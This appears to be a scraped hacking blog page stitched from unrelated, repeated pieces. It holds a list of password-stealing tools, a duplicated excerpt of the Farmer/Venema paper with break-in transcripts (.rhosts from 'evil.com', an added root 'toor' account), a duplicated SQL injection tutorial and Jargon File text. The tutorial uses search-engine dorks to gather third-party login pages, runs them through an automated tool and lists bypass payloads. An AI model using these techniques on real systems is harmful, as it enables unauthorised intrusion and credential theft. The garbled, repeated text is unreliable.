They are Free to download and it takes seconds to crush up personal computer if wired online, m not disclosing the links to these tools .
Lord PS
Lord PS is an editor that will create a password stealer/virus that emails you the passwords with tons of options, options may include taking over ur entire pc and disallowing u to access any of the files
Hosein PS v1.6
Does the same job with above with less options/features, another yahoo pass stealer
Fucker PS
This is a strong multi-password stealer that will grab passwords from all the most commonly used programs/services, msn, yahoo etc
JPS v1.8
Another password grabber/stealer - e mailer that is more focuced on Yahoo messenger
Demon PS v2.3
Yahoo messenger password stealer/mailer with anti virus kill options
and other system features
Tro messenger
The big Boss , used with Yahoo messenger lets u take over victims Pc
Many more exists,will be disclosing all of them
Even u can contributeSubscribe to: Posts (Atom)BLOG ARCHIVE
ABOUT ME
- SAINATH GUPTA
- Entrepreneur, Student at IIIT, Geek & Blogger. I am a person who loves to make load of frndz.. well thats my favorite hobby! I always look forward to make new friends, equally valuing the old ones, do feel free to say hi :)
VIEW MY COMPLETE PROFILE
Improving the Security of Your Site by Breaking Into it
Introduction
------------
Every day, all over the world, computer networks and hosts are being
broken into. The level of sophistication of these attacks varies
widely; while it is generally believed that most break-ins succeed due
to weak passwords, there are still a large number of intrusions that use
more advanced techniques to break in. Less is known about the latter
types of break-ins, because by their very nature they are much harder to
detect.
-----
CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley .
Purdue. Sun. You name it, we've seen it broken into. Anything that is
on the Internet (and many that isn't) seems to be fairly easy game. Are
these targets unusual? What happened?
Fade to...
A young boy, with greasy blonde hair, sitting in a dark room. The room
is illuminated only by the luminescense of the C64's 40 character
screen. Taking another long drag from his Benson and Hedges cigarette,
the weary system cracker telnets to the next faceless ".mil" site on his
hit list. "guest -- guest", "root -- root", and "system -- manager" all
fail. No matter. He has all night... he pencils the host off of his
list, and tiredly types in the next potential victim...
This seems to be the popular image of a system cracker. Young,
inexperienced, and possessing vast quantities of time to waste, to get
into just one more system. However, there is a far more dangerous type
of system cracker out there. One who knows the ins and outs of the
latest security auditing and cracking tools, who can modify them for
specific attacks, and who can write his/her own programs. One who not
only reads about the latest security holes, but also personally
discovers bugs and vulnerabilities. A deadly creature that can both
strike poisonously and hide its tracks without a whisper or hint of a
trail. The uebercracker is here.
-----
Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
uebermensch, or, literally translated into English, "over man."
Nietzsche used the term not to refer to a comic book superman, but
instead a man who had gone beyond the incompetence, pettiness, and
weakness of the everyday man. The uebercracker is therefore the system
cracker who has gone beyond simple cookbook methods of breaking into
systems. An uebercracker is not usually motivated to perform random
acts of violence. Targets are not arbitrary -- there is a purpose,
whether it be personal monetary gain, a hit and run raid for
information, or a challenge to strike a major or prestigious site or
net.personality. An uebercracker is hard to detect, harder to stop, and
hardest to keep out of your site for good.
Overview
--------
In this paper we will take an unusual approach to system security.
Instead of merely saying that something is a problem, we will look
through the eyes of a potential intruder, and show _why_ it is one. We
will illustrate that even seemingly harmless network services can become
valuable tools in the search for weak points of a system, even when
these services are operating exactly as they are intended to.
In an effort to shed some light on how more advanced intrusions occur,
this paper outlines various mechanisms that crackers have actually used
to obtain access to systems and, in addition, some techniques we either
suspect intruders of using, or that we have used ourselves in tests or
in friendly/authorized environments.
Our motivation for writing this paper is that system administrators are
often unaware of the dangers presented by anything beyond the most
trivial attacks. While it is widely known that the proper level of
protection depends on what has to be protected, many sites appear to
lack the resources to assess what level of host and network security is
adequate. By showing what intruders can do to gain access to a remote
site, we are trying to help system administrators to make _informed_
decisions on how to secure their site -- or not. We will limit the
discussion to techniques that can give a remote intruder access to a
(possibly non-interactive) shell process on a UNIX host. Once this is
achieved, the details of obtaining root privilege are beyond the scope
of this work -- we consider them too site-dependent and, in many cases,
too trivial to merit much discussion.
We want to stress that we will not merely run down a list of bugs or
security holes -- there will always be new ones for a potential attacker
to exploit. The purpose of this paper is to try to get the reader to
look at her or his system in a new way -- one that will hopefully afford
him or her the opportunity to _understand_ how their system can be
compromised, and how.
We would also like to reiterate to the reader that the purpose of this
paper is to show you how to test the security of your own site, not how
to break into other people's systems. The intrusion techniques we
illustrate here will often leave traces in your system auditing logs --
it might be constructive to examine them after trying some of these
attacks out, to see what a real attack might look like. Certainly other
sites and system administrators will take a very dim view of your
activities if you decide to use their hosts for security testing without
advance authorization; indeed, it is quite possible that legal action
may be pursued against you if they perceive it as an attack.
There are four main parts to the paper. The first part is the
introduction and overview. The second part attempts to give the reader
a feel for what it is like to be an intruder and how to go from knowing
nothing about a system to compromising its security. This section goes
over actual techniques to gain information and entrance and covers basic
strategies such as exploiting trust and abusing improperly configured
basic network services (ftp, mail, tftp, etc.) It also discusses
slightly more advanced topics, such as NIS and NFS, as well as various
common bugs and configuration problems that are somewhat more OS or
system specific. Defensive strategies against each of the various
attacks are also covered here.
The third section deals with trust: how the security of one system
depends on the integrity of other systems. Trust is the most complex
subject in this paper, and for the sake of brevity we will limit the
discussion to clients in disguise.
The fourth section covers the basic steps that a system administrator
may take to protect her or his system. Most of the methods presented
here are merely common sense, but they are often ignored in practice --
one of our goals is to show just how dangerous it can be to ignore basic
security practices.
Case studies, pointers to security-related information, and software are
described in the appendices at the end of the paper.
While exploring the methods and strategies discussed in this paper we we
wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
shell, perl, expect and C, it examines a remote host or set of hosts and
gathers as much information as possible by remotely probing NIS, finger,
NFS, ftp and tftp, rexd, and other services. This information includes
the presence of various network information services as well as
potential security flaws -- usually in the form of incorrectly setup or
configured network services, well-known bugs in system or network
utilities, or poor or ignorant policy decisions. It then can either
report on this data or use an expert system to further investigate any
potential security problems. While SATAN doesn't use all of the methods
that we discuss in the paper, it has succeeded with ominous regularity
in finding serious holes in the security of Internet sites. It will be
posted and made available via anonymous ftp when completed; Appendix A
covers its salient features.
Note that it isn't possible to cover all possible methods of breaking
into systems in a single paper. Indeed, we won't cover two of the most
effective methods of breaking into hosts: social engineering and
password cracking. The latter method is so effective, however, that
several of the strategies presented here are geared towards acquiring
password files. In addition, while windowing systems (X, OpenWindows,
etc.) can provide a fertile ground for exploitation, we simply don't
know many methods that are used to break into remote systems. Many
system crackers use non-bitmapped terminals which can prevent them from
using some of the more interesting methods to exploit windowing systems
effectively (although being able to monitor the victim's keyboard is
often sufficient to capture passwords). Finally, while worms, viruses,
trojan horses, and other malware are very interesting, they are not
common (on UNIX systems) and probably will use similar techniques to the
ones we describe in this paper as individual parts to their attack
strategy.
Gaining Information
-------------------
Let us assume that you are the head system administrator of Victim
Incorporated's network of UNIX workstations. In an effort to secure
your machines, you ask a friendly system administrator from a nearby
site (evil.com) to give you an account on one of her machines so that
you can look at your own system's security from the outside.
What should you do? First, try to gather information about your
(target) host. There is a wealth of network services to look at:
finger, showmount, and rpcinfo are good starting points. But don't stop
there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
and as many other services as you can find. There are so many methods
and techniques that space precludes us from showing all of them, but we
will try to show a cross-section of the most common and/or dangerous
strategies that we have seen or have thought of. Ideally, you would
gather such information about all hosts on the subnet or area of attack
-- information is power -- but for now we'll examine only our intended
target.
To start out, you look at what the ubiquitous finger command shows you
(assume it is 6pm, Nov 6, 1993):
victim % finger @victim.com
[victim.com]
Login Name TTY Idle When Where
zen Dr. Fubar co 1d Wed 08:00 death.com
Good! A single idle user -- it is likely that no one will notice if you
actually manage to break in.
Now you try more tactics. As every finger devotee knows, fingering "@",
"0", and "", as well as common names, such as root, bin, ftp, system,
guest, demo, manager, etc., can reveal interesting information. What
that information is depends on the version of finger that your target is
running, but the most notable are account names, along with their home
directories and the host that they last logged in from.
To add to this information, you can use rusers (in particular with the
-l flag) to get useful information on logged-in users.
Trying these commands on victim.com reveals the following information,
presented in a compressed tabular form to save space:
Login Home-dir Shell Last login, from where
----- -------- ----- ----------------------
root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com
bin /bin Never logged in
nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co
daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com
sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com
zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com
sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com
guest /export/foo /bin/sh Never logged in
ftp /home/ftp Never logged in
Both our experiments with SATAN and watching system crackers at work
have proved to us that finger is one of the most dangerous services,
because it is so useful for investigating a potential target. However,
much of this information is useful only when used in conjunction with
other data.
For instance, running showmount on your target reveals:
evil % showmount -e victim.com
export list for victim.com:
/export (everyone)
/var (everyone)
/usr easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy easy
/export/swap/easy easy
Note that /export/foo is exported to the world; also note that this is
user guest's home directory. Time for your first break-in! In this
case, you'll mount the home directory of user "guest." Since you don't
have a corresponding account on the local machine and since root cannot
modify files on an NFS mounted filesystem, you create a "guest" account
in your local password file. As user guest you can put an .rhosts entry
in the remote guest home directory, which will allow you to login to the
target machine without having to supply a password.
evil # mount victim.com:/export/foo /foo
evil # cd /foo
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
evil # su guest
evil % echo evil.com >> guest/.rhosts
evil % rlogin victim.com
Welcome to victim.com!
victim %
If, instead of home directories, victim.com were exporting filesystems
with user commands (say, /usr or /usr/local/bin), you could replace a
command with a trojan horse that executes any command of your choice.
The next user to execute that command would execute your program.
We suggest that filesystems be exported:
o Read/write only to specific, trusted clients.
o Read-only, where possible (data or programs can often be
exported in this manner.)
If the target has a "+" wildcard in its /etc/hosts.equiv (the default in
various vendor's machines) or has the netgroups bug (CERT advisory
91:12), any non-root user with a login name in the target's password
file can rlogin to the target without a password. And since the user
"bin" often owns key files and directories, your next attack is to try
to log in to the target host and modify the password file to let you
have root access:
evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell...
victim % ls -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
Welcome to victim.com!
victim #
A few notes about the method used above; "rsh victim.com
------------
Every day, all over the world, computer networks and hosts are being
broken into. The level of sophistication of these attacks varies
widely; while it is generally believed that most break-ins succeed due
to weak passwords, there are still a large number of intrusions that use
more advanced techniques to break in. Less is known about the latter
types of break-ins, because by their very nature they are much harder to
detect.
-----
CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley .
Purdue. Sun. You name it, we've seen it broken into. Anything that is
on the Internet (and many that isn't) seems to be fairly easy game. Are
these targets unusual? What happened?
Fade to...
A young boy, with greasy blonde hair, sitting in a dark room. The room
is illuminated only by the luminescense of the C64's 40 character
screen. Taking another long drag from his Benson and Hedges cigarette,
the weary system cracker telnets to the next faceless ".mil" site on his
hit list. "guest -- guest", "root -- root", and "system -- manager" all
fail. No matter. He has all night... he pencils the host off of his
list, and tiredly types in the next potential victim...
This seems to be the popular image of a system cracker. Young,
inexperienced, and possessing vast quantities of time to waste, to get
into just one more system. However, there is a far more dangerous type
of system cracker out there. One who knows the ins and outs of the
latest security auditing and cracking tools, who can modify them for
specific attacks, and who can write his/her own programs. One who not
only reads about the latest security holes, but also personally
discovers bugs and vulnerabilities. A deadly creature that can both
strike poisonously and hide its tracks without a whisper or hint of a
trail. The uebercracker is here.
-----
Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
uebermensch, or, literally translated into English, "over man."
Nietzsche used the term not to refer to a comic book superman, but
instead a man who had gone beyond the incompetence, pettiness, and
weakness of the everyday man. The uebercracker is therefore the system
cracker who has gone beyond simple cookbook methods of breaking into
systems. An uebercracker is not usually motivated to perform random
acts of violence. Targets are not arbitrary -- there is a purpose,
whether it be personal monetary gain, a hit and run raid for
information, or a challenge to strike a major or prestigious site or
net.personality. An uebercracker is hard to detect, harder to stop, and
hardest to keep out of your site for good.
Overview
--------
In this paper we will take an unusual approach to system security.
Instead of merely saying that something is a problem, we will look
through the eyes of a potential intruder, and show _why_ it is one. We
will illustrate that even seemingly harmless network services can become
valuable tools in the search for weak points of a system, even when
these services are operating exactly as they are intended to.
In an effort to shed some light on how more advanced intrusions occur,
this paper outlines various mechanisms that crackers have actually used
to obtain access to systems and, in addition, some techniques we either
suspect intruders of using, or that we have used ourselves in tests or
in friendly/authorized environments.
Our motivation for writing this paper is that system administrators are
often unaware of the dangers presented by anything beyond the most
trivial attacks. While it is widely known that the proper level of
protection depends on what has to be protected, many sites appear to
lack the resources to assess what level of host and network security is
adequate. By showing what intruders can do to gain access to a remote
site, we are trying to help system administrators to make _informed_
decisions on how to secure their site -- or not. We will limit the
discussion to techniques that can give a remote intruder access to a
(possibly non-interactive) shell process on a UNIX host. Once this is
achieved, the details of obtaining root privilege are beyond the scope
of this work -- we consider them too site-dependent and, in many cases,
too trivial to merit much discussion.
We want to stress that we will not merely run down a list of bugs or
security holes -- there will always be new ones for a potential attacker
to exploit. The purpose of this paper is to try to get the reader to
look at her or his system in a new way -- one that will hopefully afford
him or her the opportunity to _understand_ how their system can be
compromised, and how.
We would also like to reiterate to the reader that the purpose of this
paper is to show you how to test the security of your own site, not how
to break into other people's systems. The intrusion techniques we
illustrate here will often leave traces in your system auditing logs --
it might be constructive to examine them after trying some of these
attacks out, to see what a real attack might look like. Certainly other
sites and system administrators will take a very dim view of your
activities if you decide to use their hosts for security testing without
advance authorization; indeed, it is quite possible that legal action
may be pursued against you if they perceive it as an attack.
There are four main parts to the paper. The first part is the
introduction and overview. The second part attempts to give the reader
a feel for what it is like to be an intruder and how to go from knowing
nothing about a system to compromising its security. This section goes
over actual techniques to gain information and entrance and covers basic
strategies such as exploiting trust and abusing improperly configured
basic network services (ftp, mail, tftp, etc.) It also discusses
slightly more advanced topics, such as NIS and NFS, as well as various
common bugs and configuration problems that are somewhat more OS or
system specific. Defensive strategies against each of the various
attacks are also covered here.
The third section deals with trust: how the security of one system
depends on the integrity of other systems. Trust is the most complex
subject in this paper, and for the sake of brevity we will limit the
discussion to clients in disguise.
The fourth section covers the basic steps that a system administrator
may take to protect her or his system. Most of the methods presented
here are merely common sense, but they are often ignored in practice --
one of our goals is to show just how dangerous it can be to ignore basic
security practices.
Case studies, pointers to security-related information, and software are
described in the appendices at the end of the paper.
While exploring the methods and strategies discussed in this paper we we
wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
shell, perl, expect and C, it examines a remote host or set of hosts and
gathers as much information as possible by remotely probing NIS, finger,
NFS, ftp and tftp, rexd, and other services. This information includes
the presence of various network information services as well as
potential security flaws -- usually in the form of incorrectly setup or
configured network services, well-known bugs in system or network
utilities, or poor or ignorant policy decisions. It then can either
report on this data or use an expert system to further investigate any
potential security problems. While SATAN doesn't use all of the methods
that we discuss in the paper, it has succeeded with ominous regularity
in finding serious holes in the security of Internet sites. It will be
posted and made available via anonymous ftp when completed; Appendix A
covers its salient features.
Note that it isn't possible to cover all possible methods of breaking
into systems in a single paper. Indeed, we won't cover two of the most
effective methods of breaking into hosts: social engineering and
password cracking. The latter method is so effective, however, that
several of the strategies presented here are geared towards acquiring
password files. In addition, while windowing systems (X, OpenWindows,
etc.) can provide a fertile ground for exploitation, we simply don't
know many methods that are used to break into remote systems. Many
system crackers use non-bitmapped terminals which can prevent them from
using some of the more interesting methods to exploit windowing systems
effectively (although being able to monitor the victim's keyboard is
often sufficient to capture passwords). Finally, while worms, viruses,
trojan horses, and other malware are very interesting, they are not
common (on UNIX systems) and probably will use similar techniques to the
ones we describe in this paper as individual parts to their attack
strategy.
Gaining Information
-------------------
Let us assume that you are the head system administrator of Victim
Incorporated's network of UNIX workstations. In an effort to secure
your machines, you ask a friendly system administrator from a nearby
site (evil.com) to give you an account on one of her machines so that
you can look at your own system's security from the outside.
What should you do? First, try to gather information about your
(target) host. There is a wealth of network services to look at:
finger, showmount, and rpcinfo are good starting points. But don't stop
there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
and as many other services as you can find. There are so many methods
and techniques that space precludes us from showing all of them, but we
will try to show a cross-section of the most common and/or dangerous
strategies that we have seen or have thought of. Ideally, you would
gather such information about all hosts on the subnet or area of attack
-- information is power -- but for now we'll examine only our intended
target.
To start out, you look at what the ubiquitous finger command shows you
(assume it is 6pm, Nov 6, 1993):
victim % finger @victim.com
[victim.com]
Login Name TTY Idle When Where
zen Dr. Fubar co 1d Wed 08:00 death.com
Good! A single idle user -- it is likely that no one will notice if you
actually manage to break in.
Now you try more tactics. As every finger devotee knows, fingering "@",
"0", and "", as well as common names, such as root, bin, ftp, system,
guest, demo, manager, etc., can reveal interesting information. What
that information is depends on the version of finger that your target is
running, but the most notable are account names, along with their home
directories and the host that they last logged in from.
To add to this information, you can use rusers (in particular with the
-l flag) to get useful information on logged-in users.
Trying these commands on victim.com reveals the following information,
presented in a compressed tabular form to save space:
Login Home-dir Shell Last login, from where
----- -------- ----- ----------------------
root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com
bin /bin Never logged in
nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co
daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com
sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com
zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com
sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com
guest /export/foo /bin/sh Never logged in
ftp /home/ftp Never logged in
Both our experiments with SATAN and watching system crackers at work
have proved to us that finger is one of the most dangerous services,
because it is so useful for investigating a potential target. However,
much of this information is useful only when used in conjunction with
other data.
For instance, running showmount on your target reveals:
evil % showmount -e victim.com
export list for victim.com:
/export (everyone)
/var (everyone)
/usr easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy easy
/export/swap/easy easy
Note that /export/foo is exported to the world; also note that this is
user guest's home directory. Time for your first break-in! In this
case, you'll mount the home directory of user "guest." Since you don't
have a corresponding account on the local machine and since root cannot
modify files on an NFS mounted filesystem, you create a "guest" account
in your local password file. As user guest you can put an .rhosts entry
in the remote guest home directory, which will allow you to login to the
target machine without having to supply a password.
evil # mount victim.com:/export/foo /foo
evil # cd /foo
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
evil # su guest
evil % echo evil.com >> guest/.rhosts
evil % rlogin victim.com
Welcome to victim.com!
victim %
If, instead of home directories, victim.com were exporting filesystems
with user commands (say, /usr or /usr/local/bin), you could replace a
command with a trojan horse that executes any command of your choice.
The next user to execute that command would execute your program.
We suggest that filesystems be exported:
o Read/write only to specific, trusted clients.
o Read-only, where possible (data or programs can often be
exported in this manner.)
If the target has a "+" wildcard in its /etc/hosts.equiv (the default in
various vendor's machines) or has the netgroups bug (CERT advisory
91:12), any non-root user with a login name in the target's password
file can rlogin to the target without a password. And since the user
"bin" often owns key files and directories, your next attack is to try
to log in to the target host and modify the password file to let you
have root access:
evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell...
victim % ls -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
Welcome to victim.com!
victim #
A few notes about the method used above; "rsh victim.com
SQL injection Basic Tutorial
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
*******************************************
WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know ay
******************************************
this tutorial is not going to go into detail on why these string work
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
*******************************************
WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know ay
******************************************
SATURDAY, OCTOBER 27, 2007
Helping Hacker Culture Grow
If you enjoyed the Jargon File, please help the culture that created it grow and flourish. Here are several ways you can help:
* If you are a writer or journalist, don't say or write hacker when you mean cracker. If you work with writers or journalists, educate them on this issue and push them to do the right thing. If you catch a newspaper or magazine abusing the work `hacker', write them and straigten them out (this appendix includes a model letter).
* If you're a techie or computer hobbyist, get involved with one of the free Unixes. Toss out that lame Microsoft OS, or confine it to one disk partition and put Linux or FreeBSD or NetBSD on the other one. And the next time your friend or boss is thinking about some commercial software `solution' that costs more than it's worth, be ready to blow the competition away with free software running over i free Unix.
* Contribute to organizations like the Free Software Foundation that promote the production of high-quality free software. You can reach the Free Software Foundation at gnu@prep.ai.mit.edu, by phone at +1-617-542-5942, or by snail-mail at 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
* Support the League for Programming Freedom, which opposes over-broad software patents that constantly threaten to blow up in hackers' faces, preventing them from developing innovative software for tomorrow's needs. You can reach the League for Programming Freedom at lpf@uunet.uu.net. by phone at +1 617 621 7084, or by snail-mail at 1 Kendall Square #143, P.O.Box 9171, Cambridge, Massachusetts 02139 USA.
* If you do nothing else, please help fight government attempts to seize political control of Internet content and restrict strong cryptography. As TNHD III went to press, the so-called `Communications Decency Act' had just been declared "unconstitutional on its face" by a Federal court, but the government is expected to appeal. If it's still law when you read this, please join the effort by the Citizens' Internet Empowerment Coalition lawsuit to have the CDA quashed or repealed. Surf to the Center for Democracy and technology's home page at http://www.cdt.org to see what you can do to help fight censorship of the net.
Here's the text of a letter RMS wrote to the Wall Street Journal to complain about their policy of using "hacker" only in a pejorative sense. We hear that most major newspapers have the same policy. If you'd like to help change this situation, send your favorite newspaper the same letter -- or, better yet, write your own letter.
Dear Editor:
This letter is not meant for publication, although you can publish it if you wish. It is meant specifically for you, the editor, not the public.
I am a hacker. That is to say, I enjoy playing with computers -- working with, learning about, and writing clever computer programs. I am not a cracker; I don't make a practice of breaking computer security.
There's nothing shameful about the hacking I do. But when I tell people I am a hacker, people think I'm admitting something naughty -- because newspapers such as yours misuse the word "hacker", giving the impression that it means "security breaker" and nothing else. You are giving hackers a bad name.
The saddest thing is that this problem is perpetuated deliberately. Your reporters know the difference between "hacker" and "security breaker". They know how to make the distinction, but you don't let them! You insist on using "hacker" pejoratively. When reporters try to use another word, you change it. When reporters try to explain the other meanings, you cut it.
Of course, you have a reason. You say that readers have become used to your insulting usage of "hacker", so that you cannot change it now. Well, you can't undo past mistakes today; but that is no excuse to repeat them tomorrow.
If I were what you call a "hacker", at this point I would threaten to crack your computer and crash it. But I am a hacker, not a cracker. I don't do that kind of thing! I have enough computers to play with at home and at work; I don't need yours. Besides, it's not my way to respond to insults with violence. My response is this letter.
You owe hackers an apology; but more than that, you owe us ordinary respect.
Sincerely, etc.
* If you are a writer or journalist, don't say or write hacker when you mean cracker. If you work with writers or journalists, educate them on this issue and push them to do the right thing. If you catch a newspaper or magazine abusing the work `hacker', write them and straigten them out (this appendix includes a model letter).
* If you're a techie or computer hobbyist, get involved with one of the free Unixes. Toss out that lame Microsoft OS, or confine it to one disk partition and put Linux or FreeBSD or NetBSD on the other one. And the next time your friend or boss is thinking about some commercial software `solution' that costs more than it's worth, be ready to blow the competition away with free software running over i free Unix.
